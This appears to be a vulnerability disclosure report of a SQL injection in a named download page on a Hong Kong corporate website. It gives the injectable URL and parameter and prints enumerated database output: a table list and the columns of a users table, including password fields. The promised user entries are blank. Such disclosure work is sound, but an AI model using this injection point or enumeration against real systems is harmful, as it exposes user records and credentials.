### Brief description:
Injection point: www.yonyou.com.hk/new/download_view.php?uid=4
### Detailed description:
[<img src="https://images.seebug.org/upload/201501/12181958597ff0ae56628d98907dfebf87c25e39.png" alt="you.png" width="600">](https://images.seebug.org/upload/201501/12181958597ff0ae56628d98907dfebf87c25e39.png)
2. Database: db1007112_ufida contains 39 tables
Database: db1007112_ufida
[39 tables]
+-------------------------+
| admin_log               |
| adpic                   |
| app_cat                 |
| app_company             |
| app_file                |
| app_fileImage           |
| app_fileItem            |
| app_log                 |
| app_login               |
| app_partner             |
| app_staff               |
| banner                  |
| banner_2013             |
| banner_home_2013        |
| content_2013            |
| content_other_2013      |
| content_sub_2013        |
| down_file               |
| downform                |
| downform_2013           |
| download_2013           |
| downlog                 |
| downone                 |
| guestbook               |
| info                    |
| menu                    |
| onepage                 |
| qikan                   |
| qksort                  |
| resources_download_2013 |
| resources_menu_2013     |
| sessions                |
| sort                    |
| stats                   |
| support_2013            |
| tongji                  |
| userlog                 |
| users                   |
| video                   |
+-------------------------+
3. The users table has 12 columns
Table: users
[12 columns]
+-------------+---------------------+
| Column      | Type                |
+-------------+---------------------+
| action_list | text                |
| create_time | datetime            |
| creater     | varchar(32)         |
| email       | varchar(60)         |
| nav_list    | text                |
| password    | varchar(32)         |
| phone       | varchar(11)         |
| status      | tinyint(1) unsigned |
| tel         | varchar(11)         |
| true_name   | varchar(60)         |
| users_id    | tinyint(6) unsigned |
| users_name  | varchar(60)         |
+-------------+---------------------+
 
### Proof of vulnerability:
Table: users
[10 entries]
 
                      
                       
                    
                  
                
              
             
        
          